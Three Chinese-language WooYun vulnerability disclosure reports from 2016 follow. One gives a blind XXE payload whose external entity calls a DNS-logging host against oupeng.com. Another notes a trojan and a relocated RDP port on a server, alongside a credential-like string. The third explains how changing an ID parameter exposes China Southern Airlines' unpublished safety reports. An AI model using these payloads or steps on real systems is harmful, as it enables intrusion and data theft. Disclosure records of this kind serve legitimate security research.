漏洞详情披露状态： 2016-06-13： 细节已通知厂商并且等待厂商处理中2016-06-13： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-19： 厂商已经主动忽略漏洞，细节向公众公开简要描述：突然想用一用买的Cloudeye于是就找到了详细说明：漏洞地址code 区域http://notify.oupeng.com/notifypost数据code 区域<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM 'http://xxx.dnslog.info/oupeng'>%remote;]><root/>可以在cloudeye 中看见访问记录试下file协议 用不了 发出来 大家看一下吧漏洞证明：漏洞地址code 区域http://notify.oupeng.com/notifypost数据code 区域<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM 'http://xxx.dnslog.info/oupeng'>%remote;]><root/>可以在cloudeye 中看见访问记录 修复方案： 版权声明：转载请注明来源 sauce@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-19 12:00厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述： 详细说明：http://**.**.**.**/bugs/wooyun-2010-0181276危害看图**.**.**.**:8080/wstrp/发现了木马3389------》63389 wooyun caac.1234漏洞证明：  修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-04-29 17:24厂商回复：CNVD确认并复现所述情况，已经转由CNCERT下发给甘肃分中心，由其后续协调网站管理单位处置。最新状态：暂无

漏洞详情披露状态： 2016-05-06： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：南方航空某安全系统可越权访问全部安全事件报告详细说明：http://esms.cs-air.com/main/UserManager-esmsLogin.action南方航空安全管理系统通过在报告奖励发放处修改fwid值可越权查看尚未公布的无权查看的报告，包括最新的尚未处置的报告，由于报告中包含航空安全风险信息有可能对航空安全造成影响。通过遍历fwid值可获取全部报告。漏洞证明：http://esms.cs-air.com/main/UserManager-esmsLogin.action点击航空安全自愿报告进入如下界面，在未登录情况下原本只能访问界面中显示的几条信息，如果点击more会要求登录在已发布自愿报告中修改fwid会显示权限不足但是在年度奖励报告中修改fwid则会显示出报告内容如将有权查看的http://esms.cs-air.com/voluntary/FreewillReportEntity-reawardWithOutDetail.action?frwId=57178改成无权查看的http://esms.cs-air.com/voluntary/FreewillReportEntity-reawardWithOutDetail.action?frwId=74090可以查看新近的报告通过遍历获取了全部报告的ID 修复方案： 版权声明：转载请注明来源 黑骑士@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：5确认时间：2016-05-06 16:37厂商回复：感谢提醒。最新状态：暂无